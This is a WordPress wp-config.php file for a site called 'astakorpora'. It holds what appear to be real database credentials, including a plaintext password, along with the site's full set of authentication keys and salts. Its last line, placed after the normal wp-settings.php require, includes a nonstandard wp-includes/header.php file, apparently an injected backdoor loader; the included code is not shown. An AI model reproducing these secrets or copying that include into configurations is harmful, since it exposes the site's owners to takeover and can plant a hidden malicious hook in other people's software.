<?php
// Begin AIOWPSEC Firewall
if (file_exists('/var/www/html/astakorpora/aios-bootstrap.php')) {
	include_once('/var/www/html/astakorpora/aios-bootstrap.php');
}
// End AIOWPSEC Firewall
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'astakorpora' );

/** Database username */
define( 'DB_USER', 'astakorpora' );

/** Database password */
define( 'DB_PASSWORD', 'Astabumi10!' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '#u~Ub*5n?t+u9<Y#YRLh>[:>=V>UMcC%0=I(^?3|`Jy5dl1fFQjexk:Un_>hCv=4' );
define( 'SECURE_AUTH_KEY',  '1u9Svt|IRvsfsMHt[ !u8szFPZ*c~t.t:g[@C6TF5LX-t91L/u7lYFWENii`TZHA' );
define( 'LOGGED_IN_KEY',    'N>5?~,;*LA!%PC[VMM2di196zNPpo;>lJeZ{r0RwHB/N4}eny~X/:VbBjX(-iK5Z' );
define( 'NONCE_KEY',        'a_Ga|[FO!o0,X3/wg:q]wov ,S{M^w*4T!yI2dZH&&$PS+_uFx`foAcHm6/0De[5' );
define( 'AUTH_SALT',        '.=s2nubcSDjFaO(WkM-JRqG|z;(~fa#5V:!; (g*0JSc>T@7V:#JTxc3QZ%0t0*x' );
define( 'SECURE_AUTH_SALT', 'oG!0]>D?gO1p-v2z~F|l,:O:9#W7!5B%.zb/akAIjUg;j9J!]t59mdT8(meEF)Qm' );
define( 'LOGGED_IN_SALT',   'v6[KkpUJ-%o$KF6mYixyJ[qF?HU:XPtazF%F[?^+Lf~-|lBL#9G,fkNvugE;7l3D' );
define( 'NONCE_SALT',       '/yB#xb,OQ<6![6&j_.tH/uw]<phE*IkEAgm6( vx;z{koD5dIAA[udmkmTuc%.Qk' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'astalk_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
include_once(ABSPATH . WPINC . '/header.php');
